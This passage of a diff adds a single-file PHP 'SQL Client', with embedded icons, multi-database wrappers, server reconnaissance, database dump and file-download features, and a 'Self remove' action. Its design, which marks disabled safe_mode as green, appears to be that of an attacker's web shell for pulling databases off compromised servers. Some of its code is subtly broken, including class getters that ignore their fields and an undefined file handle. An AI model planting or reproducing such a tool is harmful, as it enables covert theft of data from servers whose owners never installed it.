+"R0lGODlhEAAQAKIEAFVVVez1AP///yYmJv///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM/S
+LrcCjBK+cIQOOM76tXZIHpgaJGlMJwEYKUq637l2rWBJe5ifru5oNBX0fF2Mt9xkzTumD8lD7o4Wke
+O7CIBADs=
+",
+"clear"=>
+"R0lGODlhEAAQANU/ACY7SUZnh4ieyZ6yuN/m8Ka611qWsr3W477Z5JzJ1md+usXO4e7w9t3k797i7
+2V+s2Foa5iqxKy/xl2it4+owaq52Ji704mjyo+gzNrf7dnk7jFUXrS/3B0zOebp80l6iWeWunqNvYa
+myqPA15mjpVaPq1WRqIePkYSVn5GUlLG6vqartXiownq6ykZbgpGfxJrB1Pb3946gy42lzNPa6k6Jn
+EiAkHyVoz1RccnS5rC72Ft7qw8ZHpq10wAAAP///yH5BAEAAD8ALAAAAAAQABAAAAZpwJ9wSCwaj8j
+kcSFz4XwBkCpm1GE4vt3FNyqdjIqMI+cRASwHgPEVqtA8DA2sBjk+AAEfz7fpIAURKz4oPh8+fwUNB
+gc+CYdHMwUEBgiNj0YUPZMINi2XRjcsJhMbPilKEgMD
+JEqtrkVBADs=
+",
+"insert"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U
+29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAPUExURf/MMzMzM8zMzGZmzAAAANwpnsUAAAA
+FdFJOU/////8A+7YOUwAAAIFJREFUeNpiYEEDAAHEwMIIBhAeMwsLQAAxsDCBAESAmZmZBSCAoAJMc
+BUAAQQVYIabARBAYDOYmBECAAHEANMLBGDDAQKIAcIHARZGBgYGFoAAYoDzoQIAAYShAiCAMMwACCA
+MWwACCMMdAAGE6lIgAAggFL+AAEAAofoWCAACDACoswMV4KhprQAAAABJRU5ErkJggg==
+",
+"download"=>
+"R0lGODlhEAAQALMAAAAAAP///wD/AAC/ACAZAZCJcf/GCvetCcDAwICAgP///wAAAAAAAAAAAAAAAA
+AAACH5BAEAAAoALAAAAAAQABAAAARIUMmpziE002Ow1pz3bd04WSEBmJXhimY4JjRdEEVNSwni/0BfA
+pAIGI9II40YDA4Ey15TKhz2dNirFZFMIqLZ8EoBKJvPZkkEADs=
+",
+"announse"=>
+"R0lGODlhEwASAMQfAP/GjAhgjPT4+v6qVbqegv7r1/+dOq3H0v3Sp1RxcAICAo22zNWzjFmTr9XDq9a
+PQmuhvN/r8ayGUO7XvkyIo4p/aH9hQ3eSlP+3b/7fv3+pu0o0Hy54nMHY42KZs////yH5BAEAAB8ALAA
+AAAATABIAAAWe4CeO4tEsZJp2TXN41KGmkVvcRyDPIqTdwFyEB2ncJg6gBjI7cDKZiUJRgWYoqBTHYd0
+oCFZHYDhaUBBogtqBRl80I0GAjbZMLW10QCBaXACAAAh3gYAXWRwMhQCEhQwcH3IYk5R3lJR7EQEDnJ1
+3nZ0cEXKgA14KGw+lex8aCQawsbKxFUw9CRIPD7O6EgkQZCUUHBwBxsbELjzLKSEAOw==
+",
+);
+
+if (!function_exists("create_image")) {
+ function create_image( $value = false ) {
+  global $images_array;
+  return base64_decode($images_array[$value]);
+ }
+}
+
+// Images
+if (isset($_GET["image"])) {
+ @ob_clean();
+ header("Content-type: image/gif");
+ header("Cache-control: public");
+ header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+ header("Cache-control: max-age=".(60*60*24*7));
+ header("Last-Modified: ".date("r",filemtime(__FILE__)));
+ echo create_image($_GET["image"]);
+ exit();
+}
+
+/*
+ * Download file
+ */
+if (!function_exists("downloadfile")) {
+ function downloadfile( $file ) {
+  @ob_clean();
+  $filetype = 'application/download';
+  header("Pragma: public");
+  header("Expires: 0");
+  header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
+  header("Cache-Control: private",false);
+  header("Content-Type: ".$filetype);
+  header("Content-Disposition: attachment; filename=\"".basename($file)."\";");
+  header("Content-Transfer-Encoding: binary");
+  header("Content-Length: ".@filesize($file));
+  set_time_limit(0);
+  $buffer = ''; 
+  $handle = @fopen($file, 'rb'); 
+  if ($handle === false) { 
+   return false; 
+  } 
+  while (!feof($handle)) { 
+   $buffer .= fread($handle, 1024); 
+  }
+  @fclose($fp);
+  echo $buffer; 
+  unlink($file);
+  exit;
+ } 
+}
+
+/*
+ * AddInput
+ */
+if (!function_exists("new_input")) {
+ function new_input($type,$name,$size,$value) {
+  $str = "<input type=\"".$type."\" name=\"".$name."\" ";
+  if($size != 0) {
+   $ret .= "size=\"".$size."\" ";
+  }
+  $str .= "value=\"".$value."\">";
+  return $str;
+ }
+}
+
+// Language array
+$lang = array(
+ // Russian
+ 'ru_text1' => 'Çàãðóçèòü ôàéë',
+ 'ru_text2' => 'Çàïðîñ',
+ 'ru_text3' => 'Ñòàòóñ ñåðâåðà',
+ 'ru_text4' => 'Ïåðåìåííûå ñåðâåðà',
+ 'ru_text5' => 'Ïðîöåññû ñåðâåðà',
+ 'ru_text6' => 'Ñïèñîê ÁÄ',
+ 'ru_text7' => 'ÁÄ',
+ 'ru_text8' => 'Actions',
+ 'ru_text9' => 'Ñîçäàòü ÁÄ',
+ 'ru_text10' => 'Âñåãî ÁÄ',
+ 'ru_text11' => 'Ïîêàçàòü',
+ 'ru_text12' => 'Ñîõðàíèòü ÁÄ',
+ 'ru_text13' => 'Óäàëèòü ÁÄ',
+ 'ru_text14' => 'Òàáëèöà',
+ 'ru_text15' => 'Ñîçäàòü òàáëèöó',
+ 'ru_text16' => 'Ñòðóêòóðà',
+ 'ru_text17' => 'Ïîêàçàòü',
+ 'ru_text18' => 'Âñòàâèòü',
+ 'ru_text19' => 'Ðåäàêòèðîâàòü',
+ 'ru_text20' => 'Óäàëèòü',
+ 'ru_text21' => 'Ñîõðàíèòü òàáëèöó',
+ 'ru_text22' => 'Ñòðóêòóðà òàáëèöû',
+ 'ru_text23' => 'Ñòðóêòóðó è èíôîðìàöèþ',
+ 'ru_text24' => 'Ñòðóêòóðó',
+ 'ru_text25' => 'Èíôîðìàöèþ',
+ 'ru_text26' => 'Ñêà÷àòü',
+ 'ru_text27' => 'Âíèìàíèå!!! Ôàéë íå ñóùåñòâóåò èëè íåò ïðàâ äëÿ ÷òåíèÿ',
+ 'ru_text28' => 'Âíèìàíèå!!! Ôàéë ïóñòîé èëè äðóãàÿ îøèáêà',
+ 'ru_text29' => 'Èíôîðìàöèÿ SQL ñåðâåðà',
+ 'ru_text30' => 'Óäàëèòü ñêðèïò',
+ 'ru_text31' => 'Ñïàñèáî ÷òî ïîëüçîâàëèñü SQL êëèåíòîì '.$version,
+ // English  
+ 'en_text1' => 'Load File',
+ 'en_text2' => 'Query',
+ 'en_text3' => 'Server status',
+ 'en_text4' => 'Server variables',
+ 'en_text5' => 'Process list',
+ 'en_text6' => 'DB List',
+ 'en_text7' => 'DB',
+ 'en_text8' => 'Actions',
+ 'en_text9' => 'Create DB',
+ 'en_text10' => 'Total DB',
+ 'en_text11' => 'Load',
+ 'en_text12' => 'Dump DB',
+ 'en_text13' => 'Drop DB',
+ 'en_text14' => 'Table',
+ 'en_text15' => 'Create Table',
+ 'en_text16' => 'Desc',
+ 'en_text17' => 'Show',
+ 'en_text18' => 'Insert',
+ 'en_text19' => 'Edit',
+ 'en_text20' => 'Delete',
+ 'en_text21' => 'Dump Table',
+ 'en_text22' => 'Table Desc',
+ 'en_text23' => 'Desc and data info',
+ 'en_text24' => 'Desc info',
+ 'en_text25' => 'Data info',
+ 'en_text26' => 'Download',
+ 'en_text27' => 'Warning!!! File not exists or not readable',
+ 'en_text28' => 'Warning!!! File is empty or some error',
+ 'en_text29' => 'Server Information',
+ 'en_text30' => 'Self remove',
+ 'en_text31' => 'Thanks for using SQL Client '.$version,
+);
+
+class ResultSet {
+ var $result;
+ var $total_rows;
+ var $fetched_rows;
+
+ function set_result( $res ) {
+  $result = $res;
+ }
+
+ function get_result() {
+  return $result;
+ }
+
+ function set_total_rows( $rows ) {
+  $total_rows = $rows;
+ }
+
+ function get_total_rows() {
+  return $total_rows;
+ }
+
+ function set_fetched_rows( $rows ) {
+  $fetched_rows = $rows;
+ }
+
+ function get_fetched_rows() {
+  return $fetched_rows;
+ }
+
+ function increment_fetched_rows() {
+  $fetched_rows = $fetched_rows + 1;
+ }
+}
+
+if (!function_exists("sql_error")) {
+ function sql_error() {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    return mysql_error();
+   break;;
+   case "mSQL":
+    return msql_error($host);
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+if (!function_exists("sql_connect")) {
+ function sql_connect($host, $user, $password, $db) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    $dbi=@mysql_connect($host, $user, $password);
+    @mysql_select_db($db);
+    return $dbi;
+   break;;
+   case "mSQL":
+    $dbi=msql_connect($host);
+    msql_select_db($db);
+    return $dbi;
+   break;;
+   case "postgres":
+    $dbi=@pg_connect("host=$host user=$user password=$password port=5432 dbname=$db");
+    return $dbi;
+   break;;
+   case "postgres_local":
+    $dbi=@pg_connect("user=$user password=$password dbname=$db");
+    return $dbi;
+   break;;
+   case "ODBC":
+    $dbi=@odbc_connect($db,$user,$password);
+    return $dbi;
+   break;;
+   case "ODBC_Adabas":
+    $dbi=@odbc_connect($host.":".$db,$user,$password);
+    return $dbi;
+   break;;
+   case "Interbase":
+    $dbi=@ibase_connect($host.":".$db,$user,$password);
+    return $dbi;
+   break;;
+   case "Sybase":
+    $dbi=@sybase_connect($host, $user, $password);
+    sybase_select_db($db,$dbi);
+    return $dbi;
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+if (!function_exists("sql_list_processes")) {
+ function sql_list_processes($id) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    return @mysql_list_processes($id);
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+if (!function_exists("sql_field_name")) {
+ function sql_field_name($res,$count) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    return mysql_field_name($res,$count);
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+if (!function_exists("sql_logout")) {
+ function sql_logout($id) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    $dbi=@mysql_close($id);
+    return $dbi;
+   break;;
+   case "mSQL":
+    $dbi=@msql_close($id);
+    return $dbi;
+   break;;
+   case "postgres":
+   case "postgres_local":
+    $dbi=@pg_close($id);
+    return $dbi;
+   break;;
+   case "ODBC":
+   case "ODBC_Adabas":
+    $dbi=@odbc_close($id);
+    return $dbi;
+   break;;
+   case "Interbase":
+    $dbi=@ibase_close($id);
+    return $dbi;
+   break;;
+   case "Sybase":
+    $dbi=@sybase_close($id);
+    return $dbi;
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+if (!function_exists("get_server_info")) {
+ function get_server_info() {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    return "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info().")";
+   break;;
+   default:
+    return "unknown";
+   break;;
+  }
+ }
+}
+
+if (!function_exists("sql_num_fields")) {
+ function sql_num_fields($res) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    return mysql_num_fields($res);
+   break;;
+   case "mSQL":
+    return msql_num_fields($res);
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+if (!function_exists("sql_affected_rows")) {
+ function sql_affected_rows() {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    return mysql_affected_rows();
+   break;;
+   case "mSQL":
+    return msql_affected_rows();
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+/*
+ * sql_query($query, $id)
+ * executes an SQL statement, returns a result identifier
+ */
+if (!function_exists("sql_query")) {
+ function sql_query($query, $id) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    $res=mysql_query($query, $id);
+    return $res;
+   break;;
+   case "mSQL":
+    $res=@msql_query($query, $id);
+    return $res;
+   break;;
+   case "postgres":
+   case "postgres_local":
+    $res=pg_exec($id,$query);
+    $result_set = new ResultSet;
+    $result_set->set_result( $res );
+    $result_set->set_total_rows( sql_num_rows( $result_set ) );
+    $result_set->set_fetched_rows( 0 );
+    return $result_set;
+   break;;
+   case "ODBC":
+   case "ODBC_Adabas":
+    $res=@odbc_exec($id,$query);
+    return $res;
+   break;;
+   case "Interbase":
+    $res=@ibase_query($id,$query);
+    return $res;
+   break;;
+   case "Sybase":
+    $res=@sybase_query($query, $id);
+    return $res;
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+/*
+ * sql_num_rows($res)
+ * given a result identifier, returns the number of affected rows
+ */
+if (!function_exists("sql_num_rows")) {
+ function sql_num_rows($res) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    $rows=mysql_num_rows($res);
+    return $rows;
+   break;;
+   case "mSQL":
+    $rows=msql_num_rows($res);
+    return $rows;
+   break;;
+   case "postgres":
+   case "postgres_local":
+    $rows=pg_numrows( $res->get_result() );
+    return $rows;
+   break;;
+   case "ODBC":
+   case "ODBC_Adabas":
+    $rows=odbc_num_rows($res);
+    return $rows;
+   break;;
+   case "Interbase":
+    echo "<BR>Error! PHP dosen't support ibase_numrows!<BR>";
+    return false;
+   break;;
+   case "Sybase":
+    $rows=sybase_num_rows($res);
+    return $rows;
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+/*
+ * sql_fetch_row(&$res,$row)
+ * given a result identifier, returns an array with the resulting row
+ * Needs also a row number for compatibility with postgres
+ */
+if (!function_exists("sql_fetch_row")) {
+ function sql_fetch_row(&$res, $nr=0) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    $row = mysql_fetch_row($res);
+    return $row;
+   break;;
+   case "mSQL":
+    $row = msql_fetch_row($res);
+    return $row;
+   break;;
+   case "postgres":
+   case "postgres_local":
+    if ( $res->get_total_rows() > $res->get_fetched_rows() ) {
+     $row = pg_fetch_row($res->get_result(), $res->get_fetched_rows() );
+     $res->increment_fetched_rows();
+     return $row;
+    } else {
+     return false;
+    }
+   break;;
+   case "ODBC":
+   case "ODBC_Adabas":
+    $row = array();
+    $cols = odbc_fetch_into($res, $nr, $row);
+    return $row;
+   break;;
+   case "Interbase":
+    $row = ibase_fetch_row($res);
+    return $row;
+   break;;
+   case "Sybase":
+    $row = sybase_fetch_row($res);
+    return $row;
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+/*
+ * sql_fetch_array($res,$row)
+ * given a result identifier, returns an associative array
+ * with the resulting row using field names as keys.
+ * Needs also a row number for compatibility with postgres.
+ */
+if (!function_exists("sql_fetch_array")) {
+ function sql_fetch_array($res, $nr=0) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    $row = array();
+    $row = mysql_fetch_array($res, MYSQL_ASSOC);
+    return $row;
+   break;;
+   case "mSQL":
+    $row = array();
+    $row = msql_fetch_array($res,$nr);
+    return $row;
+   break;;
+   case "postgres":
+   case "postgres_local":
+    if( $res->get_total_rows() > $res->get_fetched_rows() ) {
+     $row = array();
+     $row = pg_fetch_array($res->get_result(), $res->get_fetched_rows() );
+     $res->increment_fetched_rows();
+     return $row;
+    } else {
+     return false;
+    }
+   break;;
+/*
+ * ODBC doesn't have a native _fetch_array(), so we have to
+ * use a trick. Beware: this might cause HUGE loads!
+ */
+   case "ODBC":
+    $row = array();
+    $result = array();
+    $result = odbc_fetch_row($res, $nr);
+    $nf = odbc_num_fields($res); /* Field numbering starts at 1 */
+    for($count=1; $count < $nf+1; $count++) {
+     $field_name = odbc_field_name($res, $count);
+     $field_value = odbc_result($res, $field_name);
+     $row[$field_name] = $field_value;
+    }
+    return $row;
+   break;;
+   case "ODBC_Adabas":
+    $row = array();
+    $result = array();
+    $result = odbc_fetch_row($res, $nr);
+    $nf = count($result)+2; /* Field numbering starts at 1 */
+    for($count=1; $count < $nf; $count++) {
+     $field_name = odbc_field_name($res, $count);
+     $field_value = odbc_result($res, $field_name);
+     $row[$field_name] = $field_value;
+    }
+    return $row;
+   break;;
+   case "Interbase":
+    $orow=ibase_fetch_object($res);
+    $row=get_object_vars($orow);
+    return $row;
+   break;;
+   case "Sybase":
+    $row = sybase_fetch_array($res);
+    return $row;
+   break;;
+  }
+ }
+}
+
+if (!function_exists("sql_fetch_assoc")) {
+ function sql_fetch_assoc($res) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    $row = array();
+    $row = mysql_fetch_assoc($res);
+    return $row;
+   break;;
+   case "mSQL":
+    $row = array();
+    $row = msql_fetch_assoc($res);
+    return $row;
+   break;;
+  }
+ }
+}
+
+if (!function_exists("sql_fetch_object")) {
+ function sql_fetch_object(&$res, $nr=0) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    $row = mysql_fetch_object($res);
+    if($row) return $row;
+    else return false;
+   break;;
+   case "mSQL":
+    $row = msql_fetch_object($res);
+    if($row) {
+     return $row;
+    } else {
+     return false;
+    }
+   break;;
+   case "postgres":
+   case "postgres_local":
+    if( $res->get_total_rows() > $res->get_fetched_rows() ) {
+     $row = pg_fetch_object( $res->get_result(), $res->get_fetched_rows() );
+     $res->increment_fetched_rows();
+     if($row) {
+      return $row;
+     } else {
+      return false;
+     }
+    } else {
+     return false;
+    }
+   break;;
+   case "ODBC":
+    $result = odbc_fetch_row($res, $nr);
+    if(!$result) return false;
+    $nf = odbc_num_fields($res); /* Field numbering starts at 1 */
+    for($count=1; $count < $nf+1; $count++) {
+     $field_name = odbc_field_name($res, $count);
+     $field_value = odbc_result($res, $field_name);
+     $row->$field_name = $field_value;
+    }
+    return $row;
+   break;;
+   case "ODBC_Adabas":
+    $result = odbc_fetch_row($res, $nr);
+    if(!$result) return false;
+    $nf = count($result)+2; /* Field numbering starts at 1 */
+    for($count=1; $count < $nf; $count++) {
+     $field_name = odbc_field_name($res, $count);
+     $field_value = odbc_result($res, $field_name);
+     $row->$field_name = $field_value;
+    }
+    return $row;
+   break;;
+   case "Interbase":
+    $orow = ibase_fetch_object($res);
+    if($orow) {
+     $arow=get_object_vars($orow);
+     while(list($name,$key)=each($arow)) {
+      $name=strtolower($name);
+      $row->$name=$key;
+    }
+     return $row;
+    } else return false;
+   break;;
+   case "Sybase":
+    $row = sybase_fetch_object($res);
+    return $row;
+   break;;
+  }
+ }
+}
+
+/*
+ * Function Free Result for function free the memory
+ */
+if (!function_exists("sql_free_result")) {
+ function sql_free_result($res) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    return mysql_free_result($res);
+   break;;
+   case "mSQL":
+    return msql_free_result($res);
+   break;;
+   case "postgres":
+   case "postgres_local":
+    return pg_FreeResult( $res->get_result() );
+   break;;
+   case "ODBC":
+   case "ODBC_Adabas":
+    return odbc_free_result($res);
+   break;;
+   case "Interbase":
+    echo( "<BR>Error! PHP dosen't support ibase_free_result!<BR>" );
+   break;;
+   case "Sybase":
+    return sybase_free_result($res);
+   break;;
+  }
+ }
+}
+
+/*
+ * Function Format Size
+ */
+if (!function_exists("formatsize")) {
+ function formatsize( $value = false ){
+  if($value >= 1073741824) {
+   $value = round($value / 1073741824 * 100) / 100 . "Gb";
+  } elseif($value >= 1048576) {
+   $value = round($value / 1048576 * 100) / 100 . "Mb";
+  } elseif($value >= 1024) {
+   $value = round($value / 1024 * 100) / 100 . "Kb";
+  } else {
+   $value = $value . "b";
+  }
+  return $value;
+ }
+}
+
+/*
+ * Return Alphanumerical chars
+ */
+if (!function_exists("AlphanumericalClean")) {
+ function AlphanumericalClean( $str = false ) {
+  return preg_replace( "/[^à-ÿÀ-ßa-zA-Z0-9\-\_\ ]/", "" , $str );
+ }
+}
+
+/*
+ * Get server info
+ */
+if (!function_exists("server_info")) {
+ function server_info() {
+  global $tmpdir,$baseurl;
+  if (empty($tmpdir)) {
+   $tmpdir = ini_get("upload_tmp_dir");
+   if (is_dir($tmpdir)) {$tmpdir = realpath("./");}
+  }
+  $tmpdir = @realpath($tmpdir);
+  // Safe mod checking
+  if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
+   $safemode = "<font color=\"red\">ON (secure)</font>";
+  } else {
+   $safemode = "<font color=\"green\">OFF (not secure)</font>";
+  }
+  // Open Base dir
+  if (@ini_get("open_basedir") or strtolower(@ini_get("open_basedir")) == "on")  {
+
+   $openbasedir = "<font color=\"red\">ON (secure)</font>";
+  } else {
+   $openbasedir = "<font color=\"green\">OFF (not secure)</font>";
+  }
+  // Return information about server in array
+  return array
+         (
+          "OS"              => wordwrap(php_uname(),90,"<BR>",1),
+          "TMP_DIR"         => $tmpdir,
+          "UID"             => getmyuid(),
+          "GID"             => getmygid(),
+          "Process PID"     => getmypid(),
+          "Server Software" => $_SERVER["SERVER_SOFTWARE"],
+          "PHP version"     => "<a href=\"".$baseurl."&act=14\">".phpversion()."</a>",
+          "SafeMod"         => $safemode,
+          "Open Base Dir"   => $openbasedir,
+          "SQL version"     => get_server_info(),
+          "Server name"     => $_SERVER["SERVER_NAME"],
+          "Current user"    => get_current_user(),
+         );
+ }
+}
+
+/*
+ * SQL error reporting
+ */
+function error($error, $query) {
+ echo(nl2br( '<script>'."alert('"."\\n\\nThe following query failed\\n\\nSQL error message: \\n".addslashes($error)."\\n\\nFollowing query: `".addslashes($query)."`\\n\\n"."')".'</script>'."<BR><BR><font color=\"red\">Query execute faild</font><BR><hr width=\"400\"><BR>Please click <a href=\"javascript:history.back(-1)\">here</a> to go back\n\n"));
+}
+
+/*
+ * SQL query execute
+ */
+function query($id, $query) {
+ global $lang,$language;
+ $res = '';
+ if((isset($query)) && (!empty($query))) {
+  $query = stripslashes($query);
+  $res = sql_query($query, $id);
+  if (sql_error()) {
+   error(sql_error(), $query);
+  } else {
+   return $res;
+  }
+ } else {
+  return false;
+ }
+}
+
+/*
+ * SQL quick launch
+ */
+function quicklaunch() {
+ global $lang,$language,$baseurl,$server,$port,$login,$password;
+ $quicklaunch = array
+   (
+    array($lang[$language.'_text1'],$baseurl."&act=11"),
+    array($lang[$language.'_text2'],$baseurl."&act=09"),
+    array($lang[$language.'_text3'],$baseurl."&act=01"),
+    array($lang[$language.'_text4'],$baseurl."&act=00"),
+    array($lang[$language.'_text5'],$baseurl."&act=08"),
+    array($lang[$language.'_text30'],$baseurl."&act=13"),
+   );
+ $str = "<table border=\"0\" width=\"960\">\n<tr align=\"center\">\n <td rowspan=\"2\" width=\"46\"><a href=\"javascript:history.back(-1)\" title=\"Íàçàä\"><img src=\"".basename(__FILE__)."?image=back\"></a></td>\n <td rowspan=\"2\" width=\"47\"><a href=\"javascript:location.reload();\" title=\"Refresh\"><img src=\"".basename(__FILE__)."?image=reload\"></a></td>\n <td rowspan=\"2\" width=\"48\"><a href=\"".$baseurl."\" title=\"Íà ãëàâíóþ\"><img src=\"".basename(__FILE__)."?image=home\"></a></td>\n <td rowspan=\"2\" width=\"48\"><a href=\"".basename(__FILE__)."?\" title=\"Login page\"><img src=\"".basename(__FILE__)."?image=log_in_off\"></a></td>\n <td colspan=\"".count($quicklaunch)."\" width=\"760\"><hr><img border=\"0\" src=\"".basename(__FILE__)."?image=info\" align=\"absmiddle\"><B>".get_server_info()." running in ".AlphanumericalClean($server).":".AlphanumericalClean($port)." as ".AlphanumericalClean($login)." </B><BR><hr></td>\n</tr>\n<tr>";
+ if (count($quicklaunch) > 0) {
+  foreach($quicklaunch as $item) {
+   $str .= "\n <td align=\"center\">[ <a href=\"".$item[1]."\">".$item[0]."</a> ]</td>";
+  }
+ }
+ $str .= "\n</tr>\n</table>\n<BR>";
+ return $str;
+}
+
+/*
+ * List Of DB`s
+ */
+function db_list($id) {
+ global $lang,$language,$baseurl;
+ $db_list = query($id, "SHOW DATABASES"); // [-]
+ $db_count = sql_num_rows($db_list);
+ $str = "<img border=\"0\" src=\"".basename(__FILE__)."?image=db\" valign=\"middle\"><B>".$lang[$language.'_text6']."</B>\n<table border=\"0\" width=\"200\">\n<tr align=\"center\">\n <td colspan=\"2\"><B>".$lang[$language.'_text7']."</B></td>\n <td colspan=\"2\"><B>".$lang[$language.'_text8']."</B></td>\n</tr>";
+ while($odj = sql_fetch_object($db_list)) {
+  //$tbls = sql_num_rows(mysql_list_tables($tmp[1])); [-]
+  $str .= "\n<tr align=\"center\">\n <td><img border=\"0\" src=\"".basename(__FILE__)."?image=browse_db\" align=\"absmiddle\"></td>\n <td><a href=\"".$baseurl."&act=02&db=".$odj->Database."\">".$odj->Database."</a></td>\n <td><a href=\"".$baseurl."&act=10&dump=db&db=".$odj->Database."\" title=\"Backup Database ".$odj->Database."\"><img src=\"".basename(__FILE__)."?image=save\" align=\"absmiddle\"></a></td>\n <td><a href=\"javascript: confirm_function('".$baseurl."&act=03&db=".$odj->Database."');\" title=\"Drop Database ".$odj->Database."\"><img src=\"".basename(__FILE__)."?image=drop\" align=\"center\"></a>\n</tr>";
+ }
+ $str .= "\n<tr align=\"center\">\n <td colspan=\"4\">".$lang[$language.'_text10'].": <B>".$db_count."</B></td>\n</tr>\n<tr align=\"center\">\n <td colspan=\"4\"><a href=\"".$baseurl."&act=04\">[ ".$lang[$language.'_text9']." ]</a></td>\n</tr>\n</table>\n";
+ return $str;
+}
+
+/*
+ * SQL dump DB
+ */
+function dump_db($id, $db,& $type) {
+ global $lang,$language,$baseurl,$dbtype;
+ $tmp = server_info();
+ $act_sql = query( $id, "SHOW TABLES FROM `".AlphanumericalClean($db)."`" );
+ if (sql_num_rows($act_sql) > 0) {
+  if((isset($type))) {
+   $file = $tmp["TMP_DIR"]."/db_".$_SERVER["SERVER_NAME"]."_".$dbtype."_".date("Y-m-d-H-i-s").".sql";
+   $fp = fopen($file, "w");
+   if (!$fp) {
+    return "<BR>Dump error! Can't write to ".htmlspecialchars($file);
+   }
+   fputs ($fp, "#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# [ SQL Client ]\n# Dumped by SQL Client \n#\n# SQL version: (".get_server_info().")\n# Date: ".date("F j, Y, g:i a")."\n# Dump DB: `$db`"."\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
+  }
+  switch($type) {
+   case "struct":
+    while ($tbl = sql_fetch_row($act_sql)) {
+     fputs($fp, "\n#\n# Dump for table: `".$tbl[0]."`;\n#\n");
+     fputs($fp, "\nDROP TABLE IF EXISTS `".$tbl[0]."`;\n");
+     $sql = query( $id, "SHOW CREATE TABLE `$tbl[0]`");
+     $row = sql_fetch_row($sql);
+     fputs($fp, $row[1].";\n\n");
+    }
+   break;
+   case "data":
+    while ($tbl = sql_fetch_row($act_sql)) {
+     fputs($fp, "\n#\n# Dump for table: `".$tbl[0]."`;\n#\n");
+     $sql = query( $id, "SELECT * FROM `$tbl[0]`" );
+     if (sql_num_rows($sql) > 0) {
+      while ($row = sql_fetch_assoc($sql)) {
+       $keys = implode("`, `", array_keys($row));
+       $values = array_values($row);
+       foreach($values as $key=>$value) {
+        $values[$key] = addslashes($value);
+       }
+       $values = implode("', '", $values);
+       $sql_dump = "INSERT INTO `$tbl[0]` (`".$keys."`) VALUES ('".$values."');\n";
+       fputs($fp, $sql_dump);
+      }
+     } else {
+      fputs($fp, "# TABLE `$tbl[0]` IS AMPTY\n\n");
+     }
+    }
+   break;
+   case "full":
+    while ($tbl = sql_fetch_row($act_sql)) {
+     fputs($fp, "\n#\n# Dump for table: `".$tbl[0]."`;\n#\n");
+     fputs($fp, "\nDROP TABLE IF EXISTS `".$tbl[0]."`;\n");
+     $sql = query( $id, "SHOW CREATE TABLE `$tbl[0]`");
+     $row = sql_fetch_row($sql);
+     fputs($fp, $row[1].";\n\n");
+     $sql = query( $id, "SELECT * FROM `$tbl[0]`" );
+     if (sql_num_rows($sql) > 0) {
+      while ($row = sql_fetch_assoc($sql)) {
+       $keys = implode("`, `", array_keys($row));
+       $values = array_values($row);
+       foreach($values as $key=>$value) {
+        $values[$key] = addslashes($value);
+       }
+       $values = implode("', '", $values);
+       $sql_dump = "INSERT INTO `$tbl[0]` (`".$keys."`) VALUES ('".$values."');\n";
+       fputs($fp, $sql_dump);
+      }
+     } else {
+      fputs($fp, "# TABLE `$tbl[0]` IS AMPTY\n\n");
+     }
+    }
+   break;
+   default:
+    return "<BR><BR><B>Backup DataBase</B><BR><table><tr> <td><a href=\"".$baseurl."&act=10&dump=db&db=".$db."&type=full\">Full backup (Strukture and Data)</a></td></tr><tr> <td><a href=\"".$baseurl."&act=10&dump=db&db=".$db."&type=struct\">Only Structure</a></td></tr><tr> <td><a href=\"".$baseurl."&act=10&dump=db&db=".$db."&type=data\">Only data info</a></td></tr></table>";
+   break;
+  }
+  fclose($fp);
+ } else {
+  return "\n<BR><BR>Database ".AlphanumericalClean($db)." is empty or Database doesn't exist";
+ }
+ return "\n<BR><BR><font color=\"green\">Dumped! Dump has been writed to <a href=\"".$baseurl."&act=11&file=".urlencode(realpath($file))."\">".htmlspecialchars(realpath($file))."</a> (".formatsize(@filesize($file)).")</font><BR><BR>\n<img border=\"0\" src=\"".basename(__FILE__)."?image=download\">&nbsp;<B>".$lang[$language.'_text26']."</B>&nbsp;<a href=\"".$baseurl."&act=12&file=".urlencode($file)."\">Click</a>";
+}
+
+
+/*
+ * SQL dump table
+ */
+function dump_tbl($id, $tbl, $type) {
+ global $lang,$language,$baseurl,$dbtype;
+ $tmp = server_info();
+ if((isset($type))) {
+  $file = $tmp["TMP_DIR"]."/tbl_".$_SERVER["SERVER_NAME"]."_".$dbtype."_".date("Y-m-d-H-i-s").".sql";
+  $fp = fopen($file, "w");
+  if (!$fp) {
+   return "<BR>Dump error! Can't write to ".htmlspecialchars($file);
